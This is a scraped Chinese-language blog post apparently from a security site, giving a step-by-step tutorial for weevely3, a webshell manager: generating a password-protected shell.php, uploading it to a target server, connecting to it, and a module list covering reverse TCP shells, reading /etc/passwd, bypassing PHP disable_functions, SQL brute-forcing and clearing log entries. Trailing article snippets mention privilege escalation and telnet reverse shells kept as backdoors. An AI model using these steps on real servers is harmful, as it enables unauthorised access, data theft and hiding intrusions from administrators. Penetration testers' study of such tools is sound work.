<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Kali系列 -- linux菜刀(weevely3)

    VSole2023-03-06 10:09:20

    簡介:一款運行在linux系統上的webshell管理工具,可以實現Shell訪問目標,以目標為中心的SQL控制臺,HTTP / HTTPS代理瀏覽目標,上傳和下載文件,生成反向和直接TCP Shell,審核遠程目標安全,端口掃描以目標為中心,掛載遠程文件系統,以目標為中心的Bruteforce SQL帳戶。

    一、下載地址(軟件作者)

    https://github.com/epinna/weevely3

    二、安裝使用

    1、下載到本地

    git clone https://github.com/epinna/weevely3.git
    

    2、進入到weebely3目錄

    cd weebely3
    

    3、安裝需要的模塊

    pip3 install -r requirements.txt
    

    4、啟動weevely.py

    ./weevely.py
    

    5、生成木馬文件,在weebely3文件夾中會生成一個連接密碼為123的shell.php

    ./weevely.py generate 123 shell.php
    

    6、上傳shell文件到目標服務器

    7、連接木馬

    ./weevely.py http://192.168.139.129:81/shell.php 123
    

    8、獲取文件目錄,dir

    9、利用模塊收集信息

    WIN-5FMG87H62FN:C:\phpstudy_pro\WWW $ :system_info -info uname
    

    10、直接輸入help,查看其它可利用模塊

    :shell_su                     通過更變使用者來執行shell命令,可以獲得root權限來執行命令.                                            
    :shell_sh                     執行 shell 命令.                                              
    :shell_php                    執行 PHP 命令.                                                
    :system_extensions            收集PHP和webserver擴展列表                           
    :system_info                  收集系統信息                                          
    :system_procs                 列出正在運行的進程                                              
    :audit_disablefunctionbypass  使用mod_cgi和.htaccess繞過系統禁用函數的限制。它會上傳.htaccess和CGI腳本,并在遠程服務器上運行偽系統shell     
    :audit_etcpasswd              查看/etc/passwd文件                           
    :audit_suidsgid               查找帶有SUID或SGID標志的文件。
    :audit_phpconf                查看php配置信息                                             
    :audit_filesystem             審核文件系統的弱權限。枚舉各種系統目錄并尋找可讀寫執行的目錄,模塊僅默認搜索部分linux下的常見目錄,logs、root、home等                         
    :backdoor_reversetcp          執行反向TCP shell. 需要nc -lvp 監聽                                        
    :backdoor_tcp                 在TCP端口上生成shell                                         
    :net_scan                     TCP端口掃描.                                                       
    :net_mail                     發送郵件.                                                           
    :net_ifconfig                 獲取網絡接口地址.                                    
    :net_curl                     執行類似curl的HTTP請求.                                    
    :net_proxy                    運行本地代理以通過目標轉移HTTP / HTTPS瀏覽
    :net_phpproxy                 在目標上安裝PHP代理.                                     
    :bruteforce_sql               可用來猜解數據庫密碼.                                             
    :file_find                    查找具有給定名稱和屬性的文件.                          
    :file_download                從遠程文件系統下載文件.                                
    :file_check                   獲取文件的屬性和權限.                            
    :file_touch                   更改文件時間戳.                                               
    :file_cd                      更改當前工作目錄.                                    
    :file_grep                    打印與多個文件中的模式匹配的行.                    
    :file_gzip                    壓縮或解壓gzip文件.                                       
    :file_tar                     壓縮或解壓tar文件.                                     
    :file_enum                    檢查路徑列表的存在和權限
    :file_bzip2                   壓縮或解壓bzip2文件.                                      
    :file_mount                   使用HTTPfs掛載遠程文件系統.                                
    :file_clearlog                從文件中刪除字符串.                                           
    :file_zip                     壓縮或解壓zip文件.                                        
    :file_cp                      復制單個文件.                                                    
    :file_upload2web              自動將文件上傳到Web文件夾并獲取相應的URL.
    :file_edit                    在本地編輯器上編輯遠程文件.                                  
    :file_read                    從遠程文件系統中讀取遠程文件.                         
    :file_webdownload             指定URL下載文件.                                                     
    :file_upload                  文件上載到遠程文件系統.                                    
    :file_ls                      列出目錄內容.                                              
    :file_rm                      刪除遠程文件.                                                  
    :sql_dump                     Multi dbms mysqldump replacement.                                    
    :sql_console                  執行SQL查詢或運行sql控制臺.
    
    linux系統shell
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    8、獲取文件目錄,dir9、利用模塊收集信息WIN-5FMG87H62FN:C:\phpstudy_pro\WWW $ :system_info -info uname
    大多數計算機系統設計為可與多個用戶一起使用。特權是指允許用戶執行的操作。普通特權包括查看和編輯文件或修改系統文件。特權升級意味著用戶獲得他們無權獲得的特權。這些特權可用于刪除文件,查看私人信息或安裝不需要的程序,例如病毒。
    一文吃透 Linux 提權
    2021-10-23 07:09:32
    特權升級意味著用戶獲得他們無權獲得的特權。通常,當系統存在允許繞過安全性的錯誤或對使用方法的設計假設存在缺陷時,通常會發生這種情況。結果是,具有比應用程序開發人員或系統管理員想要的特權更多的應用程序可以執行未經授權的操作。
    PHP disable_functions disable_functions是php.ini中的一個設置選項。相當一個黑名單,可以用來設置PHP環境禁止使用某些函數,通常是網站管理員為了安全起見,用來禁用某些危險的命令執行函數等。
    disable_functions是php.ini中的一個設置選項。相當一個黑名單,可以用來設置PHP環境禁止使用某些函數,通常是網站管理員為了安全起見,用來禁用某些危險的命令執行函數等。
    相當一個黑名單,可以用來設置PHP環境禁止使用某些函數,通常是網站管理員為了安全起見,用來禁用某些危險的命令執行函數等。高ini_restore()可用于恢復 PHP 環境配置參數到其初始值
    由于低權限用戶無法執行太多操作,可以利用反彈上傳Churrasco.exe,后續可以利用它來做提權。輸入net user指令查看是否添加成功,最后提權成功。linux系統提權思路linux基礎信息收集uname -a 顯示全部系統信息cat /etc/issue 內核信息。
    服務器的相關信息(真實ip,系統類型,版本,開放端口,WAF等) 網站指紋識別(包括,cms,cdn,證書等),dns記錄 whois信息,姓名,備案,郵箱,電話反查(郵箱丟社工庫,社工準備等) 子域名收集,旁站,C段等 google hacking針對化搜索,pdf文件,中間件版本,弱口令掃描等 掃描網站目錄結構,爆后臺,網站banner,測試文件,備份等敏感文件泄漏等 傳輸協議,通用漏洞,ex
    ?上整理的?試問題?全,有些 HW ?試的題,已經收集好了,提供給?家。
    今天給大家介紹兩種telnet反彈shell的方法,相對于其他方式反彈shell要簡單一點,可作為按需遠程控制或留后門使用,希望可以幫助到大家。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类